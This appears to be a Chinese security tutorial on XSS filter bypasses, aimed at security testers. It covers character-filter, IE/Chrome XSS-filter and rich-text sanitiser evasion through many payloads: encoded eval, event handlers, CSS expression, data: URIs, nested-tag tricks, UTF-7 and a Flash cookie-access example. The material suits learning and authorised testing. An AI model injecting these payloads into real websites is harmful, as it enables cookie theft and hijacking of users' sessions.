跨站测试与利用中的绕过技术

简介: 1.1 bypass Char 通常有安全意识的程序员往往会对输入进行一定的过滤,比较常见的是针对某一关键符号进行过滤,比如“”,这种方式很多时候是无法防止攻击的,更安全的方式是通过编程语言提供的函数在输出的时候进行过滤。

1.1 bypass Char

通常有安全意识的程序员往往会对输入进行一定的过滤,比较常见的是针对某一关键符号进行过滤,比如“<”或者“>”,这种方式很多时候是无法防止攻击的,更安全的方式是通过编程语言提供的函数在输出的时候进行过滤。

本节主要针对单字符过滤进行研究,分为引号、尖括号、括号这三个符号进行研究。

1.1.1 引号

在跨站测试中很多的vector(即攻击向量)本身是不包含引号的,例如下面的一些vector。但是在利用中经常需要使用引号,如果对引号进行了过滤,可以采取如下措施进行绕过。

?
1
2
3
4
5
vector:
<script>alert(/ourren_demo/)</script>
<iframe/onload=alert(/ourren_demo/)>
<img src=x onerror=alert(/ourren_demo/)>
<p onmouseover=alert(/ourren_demo/)>ourren_demo here.</p>

1)String.fromCharCode

fromCharCode可以对利用代码中的引号进行编码处理,但是需要利用eval函数结合进行使用,例如:

?
1
2
3
<script>alert( 'ourren_demo' )</script>
----->
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,105,110,115,105,103,104,116,45,108,97,98,115,39,41))</script>

2)location.hash

将带有引号的内容放在location.hash中,其实这个也可以突破跨站长度的控制。

?
1
<script>eval(location.hash.slice(1))</script> #alert('a')

1.1.2 尖括号

通常程序员为了偷懒都只会过滤尖括号,因此尖括号在跨站过滤中遇到情况最多。一般情况下如果输入没有显示在其他标签里,那么基本上是没有办法进行攻击的,但是如果是输出到其他标签里,则可以结合上下标签进行如下测试:

1)事件函数

常用的一些事件函数有:onerror、onmouseover、onload等(同时可以关注下HTML5新标签),需要的时候可以对JavaScript的事件函数进行fuzz。

?
1
2
3
4
<img src=x onerror=alert(/ourren_demo/)>
<p onmouseover=alert(/ourren_demo/)>ourren_demo here.</p>
<frameset onload=alert(/ourren_demo/)>
<body onload=alert(/ourren_demo/)>

2)style与expression

通过标签的style样式进行跨站(测试中只有IE成功,同时还得考虑filter问题)。

?
1
<div style= "width:expression(alert('ourren_demo'));" >

3) JavaScript伪协议

JavaScript伪协议进行绕过。

?
1
<img src=javascript:alert( 'ourren_demo' )> (仅IE)

1.1.3 括号

如果测试中发现括号被过滤了,或者无法注入括号,可以进行如下测试:

1)外部文件

通过src引入外部文件,而利用代码放在外部文件中(其中外部文件的后缀可以不为js)。

?
1
2
<script src= '1.js' ></script>
<script src= '2.jpg' ></script>

2)hex、dec编码

利用十六进制与十进制进行编码。

?
1
2
<div style= "&#119&#105&#100&#116&#104&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110&#40&#97
&#108&#101&#114&#116&#40&#39&#120&#115&#115&#101&#114&#39&#41&#41" >xsser</div>

1.2 bypass filter

针对跨站问题日益严重,浏览器厂商从自身浏览器安全出发推出了各自的跨站过滤器。但是这类过滤器基本上只支持反射型跨站,其他类型跨站基本不受影响。

各种浏览器采用的防御机制各不相同。反射型跨站防御方面:Firefox基本没什么防御,而IE和chrome都有各自的防御机制,并且都很难绕过,这里主要总结下现有的一些可以绕过机制。

1.2.1 IE Filter

IE从IE7就支持XSS Filter,其整体架构可见参考文献1,正则匹配部分可以参见文献2。实际处理步骤可分为三步:首先对IE进行启发式过滤(heuristic filters,正则匹配);如果在HTTP请求中匹配到这些特征,那么就做一个动态签名(create dynamic signature);如果在HTTP响应中有原来的签名,那么就进行替换修改(neuter response)。在IE全补丁下进行测试,现有公布的绕过技术基本上很少,先总结如下:

1)<a href=>

针对普通的反射型跨站,可以利用A标签和“sc%0aript”实现绕过,不过需要用户交互,这里需要美工师咯。其实原理是页面输出后这两个页面属于同一域,因此不会产生过滤。如果href里面的地址是不同域就会产生过滤。

?
1
2
3
4
<a href= "xss.php?a=<sc%0aript>alert(/ourren_demo/)</script>" >
<a href= "xss.php?a=<sc%0aript>alert(/ourren_demo/)</script>" >
<div style= "position: absolute; left: 0px; top: 0px; height: 1000px; width: 1000px;
padding: 1em;background:black;text-align: center;" >click to continue </div></a>

2)utf7

通过UTF7-BOM实现注入代码,全补丁情况下只有当header里编码为utf-7才能成功,可以参考文献3。

?
1
%2BACIAPgA8-script%2BAD4-alert%28/ourren_demo/%29%2BADw-%2Fscript%2BAD4APAAi-&oe=Windows-31J

3) Flash

在 www.B.com域名下用iframe嵌入www.A.com的flash XSS文件。当受害者打开了www.B.com的域名时,我们可以成功获取其在www.A.com的cookies数据,参见文献8。

测试代码如下(IE):

?
1
2
(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()" ></iframe>

在chrome中,可能会导致浏览器崩溃,可以改用以下代码。

?
1
2
(function(){alert(document.cookie)})()" ></iframe>

1.2.2 chrome filter

chrome浏览器针对xss过滤规则跟IE有比较大的区别,不同版本的chrome测试也会不同,现有的资料可以参考文献4、5。

1)  data协议

?
1
2
3
4
5
6
7
?vuln=<a href= "javascript:alert(document.cookie);" >click</a> //会拦截
-->转换成  <a href= "javascript:void(0)" >click</a>
//bypass
?vuln=<a href= "data:text/html;
base64,PHNjcmlwdD5hbGVydCgnSGVsbG8gd29ybGQhJyk8L3NjcmlwdD4=
" >click<a>
->OK

1.3 bypass richtext

富文本常见类别有留言,日志或者邮件等。与一般的跨站相比它可以使用现有的标签进行测试分析。一般过滤机制分为两种:黑名单、白名单,这两类机制实质都是基于正则匹配进行过滤,因此在测试过程中需要对比输入和输出,然后进行针对性变化。

常见测试流程:输入常见标签和事件——>是否有存在的标签没有过滤——->变形或者分析其属性

标签:object, applet, base, link, meta, import, embed, vmlframe, iframe, script, style, isindex, form,textarea,

字符:javascript:, vbscript:

事件:onload,onerror,on*

1.3.1 绕过规则

本小节将一些常见的一些变化规则进行了归类,实际测试中结合多种方式进行组合测试。

 1)未递归过滤

很多富文本过滤都是针对关键字过滤,但是没有进行递归过滤,导致过滤后的结果重新组成新的标签,例如:

?
1
2
<ifra<iframe>me>之------过滤------<iframe>----------<iframe>
<s<script></script>cript>-----过滤---<script>----------<script></script>

2)编码

利用字符的十六进制和十进制编码进行绕过关键字。由于expression只有IE能执行,因此仅限于IE。

?
1
2
3
4
5
6
<div style= "width:expression(alert(/ourren_demo/))" >ourren_demo</div> 
<div style= "width:\0065xpression(alert(/ourren_demo/))" >ourren_demo</div>
//两次不同类型编码
<div style= "width:\0065xpressio\6e(alert(/ourren_demo/))" >ourren_demo</div> 
<div style= "&#119&#105&#100&#116&#104&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110
&#40&#97&#108&#101&#114&#116&#40&#39&#120&#115&#115&#101&#114&#39&#41&#41" >xsser</div>

3)特殊字符

在构造的vector中可以插入tab、换行、等其他空白字符或者”/**”绕过关键字匹配,基本上也只限于IE。

?
1
2
3
<img src= "java   scr ipt:alert(/ourren_demo/)" >  两次tab,ie6
<div style= "width:exp/**
**/ression(alert(/ourren_demo/))" >ourren_demo</div>  IE

4)非常见协议

利用object标签,将date属性数据进行base64编码绕过关键数据,同时object标签也是经常被遗忘的标签。

?
1
<object data= "data:text/html;base64,PHNjcmlwdD5hbGVydCgvaW5zaWdodC1sYWJzLyk8L3NjcmlwdD4=" >

5)HTML5

利用HTML5新标签或者新属性进行绕过,相对而言这类利用要求的环境相对比较苛刻,详细见参考文献6。

新标签:<button>,<video>,<audio>,<article>,<footer>,<nav>

新属性:autocomplete, autofocus, pattern ..etc

?
1
2
<input onfocus=write(1) autofocus>
<video poster=javascript:alert(1) //></video>

6)浏览器方面

可以从浏览器解析角度进行考虑,需要浏览器解析方面进行深入分析,然后进行改进与分析,提供几个这类的vector。

// IE的注释方式

?
1
2
<!--[ if IE]><img src= # width=0 height=0 onerror=alert(/ourren_demo/)><![endif]--> 
<comment><img src= "</comment><img src=x onerror=alert(/ourren_demo/)//" >   IE

1.3.2 利用技巧

在实际利用中常常会遇到一些其它问题,比如说代码死循环,长度不够用等先将其总结如下:

       1)expression

由于expression属性比较特殊,同时只支持IE,而其执行相当于一个死循环的EVAL函数,同时style标记里不能出现”;”字符,也就是不能构造多条连接在一起的javascript,因此构造出如下语句:

?
1
2
3
4
5
6
<DIV STYLE= "xss:ex/**/pre/**/ssion(eval(xss));" xss= "var Then=new Date();Then.setTime(Then.getTime()+10*1000);
if(document.cookie.indexOf('Cookie1=') == -1){document.cookie='Cookie1=RAY;expires='+Then.toGMTString();
alert(/ourren_demo/);}" >
//设置一个COOKIE在10秒后失效,并在这条COOKIE语句中执行其他语句或函数。
也可以通过window对象来实现:
<div style= "width:expression((window.x==1)?'':(window.x=1,alert(/ourren_demo/)))" >xsser</div>

2)长度限制

这个在”突破XSS字符数量限制执行任意JS代码”一文中有详细讲解,参考文献7。当然在支持HTML5的浏览器还可以利用下本地存储。

参考文献

1.http://blogs.technet.com/b/srd/archive/2008/08/18/ie-8-xss-filter-architecture-implementation.aspx

2. Abusing Internet Explorer 8′s XSS Filters.pdf

3. http://hi.baidu.com/thanks4sec/blog/item/1b06348ae87e2cb10df4d27c.html

4. http://evilcos.me/?p=60

5. http://hi.baidu.com/rayh4c/blog/item/c3fb8d0a6bf93422b1351ddc.html

6. http://html5sec.org/

7. http://huaidan.org/pstzine/0×03/txt/PSTZine_0x03_0x04.txt

8. http://zone.wooyun.org/content/368


目录
相关文章
|
4月前
|
人工智能 缓存 并行计算
技术改变AI发展:Ada Lovelace架构解读及RTX 4090性能测试分析(系列三)
简介:随着人工智能(AI)的迅速发展,越来越多的应用需要巨大的GPU计算资源。Ada lovelace(后面简称Ada)是NVIDIA最新的图形处理器架构,随2022年9月20日发布的RTX 4090一起公布。
135410 10
技术改变AI发展:Ada Lovelace架构解读及RTX 4090性能测试分析(系列三)
|
6月前
|
算法 异构计算
m基于FPGA的OFDM系统中降PAPR技术的实现,包含testbench测试文件和MATLAB辅助测试
m基于FPGA的OFDM系统中降PAPR技术的实现,包含testbench测试文件和MATLAB辅助测试
50 0
|
1月前
|
安全 测试技术
现代软件测试中的自动化技术应用及挑战
在当今数字化时代,软件测试的重要性日益凸显。本文探讨了现代软件测试中自动化技术的应用现状和挑战,分析了自动化测试在提高效率、降低成本、增强可靠性等方面的优势,同时也提出了自动化测试所面临的挑战和解决方案。
|
1月前
|
人工智能 测试技术 虚拟化
现代软件测试中的自动化工具与技术
随着信息技术的迅猛发展,现代软件开发和测试领域也在不断创新。本文将探讨现代软件测试中自动化工具与技术的应用。通过分析自动化测试的优势、挑战以及最佳实践,帮助读者更好地理解当前软件测试领域的发展趋势,并为实际工作提供参考。
19 1
|
1月前
|
敏捷开发 供应链 测试技术
深入理解与应用软件测试中的Mock技术
【2月更文挑战第30天】 在现代软件开发过程中,单元测试是保证代码质量的重要手段。然而,对于高度依赖外部系统或服务的应用来说,传统的单元测试方法往往难以实施。Mock技术应运而生,它通过模拟外部依赖的响应,使开发者可以在隔离的环境中测试目标代码。本文将探讨Mock技术的概念、应用场景以及如何在软件测试中有效地使用Mock对象,以增强测试的灵活性和可靠性。
|
2月前
|
调度
【技术探讨】无线通信模块拉距测试,是否一定要带笔记本电脑?
对于Sub-G的无线模块通常通信距离较远可以达到公里级甚至数公里之远,而笔记本的续航时间通常是2-3个小时,很多用户测试到一半,不得不提前终止测试,回去给笔记本电脑充电
|
2月前
|
人工智能 测试技术 API
你知道哪些新兴的测试技术?
你知道哪些新兴的测试技术?
|
3月前
|
安全 测试技术 数据库
常见测试技术都有哪些?
常见测试技术都有哪些?
|
3月前
|
人工智能 运维 搜索推荐
测试技术大会可以给我们带来什么?
测试技术大会可以给我们带来什么?
|
3月前
|
安全 Linux 测试技术
深入Kali Linux:高级渗透测试技术详解
深入Kali Linux:高级渗透测试技术详解
174 0

热门文章

最新文章